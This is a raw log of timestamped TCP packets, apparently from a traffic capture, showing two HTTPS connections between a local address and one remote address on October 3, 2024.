                                                                                                                                                                            Oct 3, 2024 03:27:02.734788895 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:02.734797955 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.387727022 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.387792110 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.388406038 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.388413906 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.390881062 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.390887976 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818352938 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818393946 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818413973 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818562984 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818562984 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818583012 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.818737030 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.849159956 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.849181890 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.849244118 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.849253893 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.849309921 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.916322947 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.916346073 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.916426897 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.916435003 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.916466951 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.916486025 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.945812941 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.945839882 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.945970058 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.945979118 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.946065903 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.983959913 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.983980894 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.984196901 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.984205008 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:03.984257936 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.014477015 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.014497995 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.014574051 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.014581919 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.014614105 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.014631987 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.033444881 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.033463955 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.033534050 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.033544064 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.033576965 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.033596992 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.051130056 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.051152945 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.051215887 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.051225901 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.051238060 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.051268101 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.068933964 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.068953991 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.069015026 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.069022894 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.069073915 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.083317041 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.083339930 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.083396912 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.083403111 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.083436966 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.083458900 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.100497007 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.100518942 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.100569010 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.100574970 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.100615978 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.100637913 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.113915920 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.113940954 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.114011049 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.114017963 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.114056110 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.114078999 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.129106045 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.129132986 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.129185915 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.129194021 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.129247904 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.140580893 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.140604019 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.140660048 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.140670061 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.140698910 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.140723944 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.149342060 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.149363041 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.149406910 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.149413109 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.149442911 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.149466038 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.159126997 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.159171104 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.159199953 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.159207106 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.159245014 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.159271002 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.167995930 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.168037891 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.168071985 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.168078899 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.168116093 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.168140888 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.175148964 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.175169945 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.175220013 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.175226927 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.175257921 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.175296068 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.183392048 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.183419943 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.183468103 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.183475018 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.183511972 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.183535099 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202398062 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202420950 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202505112 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202591896 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202630997 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.202655077 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217561960 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217586040 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217639923 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217650890 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217688084 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.217709064 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229231119 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229284048 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229320049 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229329109 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229360104 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.229374886 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237860918 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237881899 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237982035 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.237998962 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.238092899 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247801065 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247823000 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247874022 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247885942 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247910023 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.247926950 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255040884 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255064964 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255131006 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255146027 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255177021 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.255188942 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263698101 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263724089 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263767004 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263776064 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263806105 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.263840914 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271785021 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271809101 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271846056 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271852970 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271886110 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.271895885 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291085958 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291107893 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291172028 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291182995 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.291301012 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306328058 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306364059 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306408882 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306420088 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306447029 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.306474924 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317838907 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317869902 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317924023 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317939997 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.317986012 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.318007946 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326488018 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326508999 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326562881 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326570988 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326596022 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.326610088 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336270094 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336292028 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336342096 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336350918 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336386919 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.336404085 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343744040 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343764067 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343817949 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343828917 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343858004 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.343893051 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.352488041 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.352516890 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.352601051 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.352619886 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.352674961 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.360421896 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.360440969 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.360510111 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.360517025 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.360569000 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.360589981 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.379573107 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.379595041 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.379642963 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.379653931 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.379688978 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.379708052 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395102024 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395124912 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395206928 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395215988 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395230055 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395266056 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395299911 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395308018 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395322084 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395380974 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395421028 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395802021 CEST49723443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:04.395823002 CEST4434972349.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:05.408014059 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:05.408065081 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:05.408134937 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:05.408556938 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:05.408572912 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.072148085 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.072222948 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.072940111 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.072952986 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.075221062 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.075227976 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509100914 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509131908 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509159088 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509172916 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509202003 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509208918 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.509263039 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.540956020 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.540987015 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.541096926 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.541110992 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.541152954 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.609648943 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.609688997 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.609741926 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.609759092 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.609782934 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.609812021 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.639199972 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.639240026 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.639280081 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.639287949 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.639316082 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.639333963 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.675255060 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.675292969 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.675327063 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.675334930 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.675374031 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.675400972 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.706717014 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.706785917 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.706818104 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.706825972 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.706850052 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.706861019 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.728102922 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.728135109 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.728189945 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.728198051 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.728229046 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.728246927 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.746166945 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.746190071 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.746267080 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.746275902 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.746313095 CEST49724443192.168.2.949.12.197.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.763850927 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.763875008 CEST4434972449.12.197.9192.168.2.9
                                                                                                                                                                            Oct 3, 2024 03:27:06.764050007 CEST49724443192.168.2.949.12.197.9
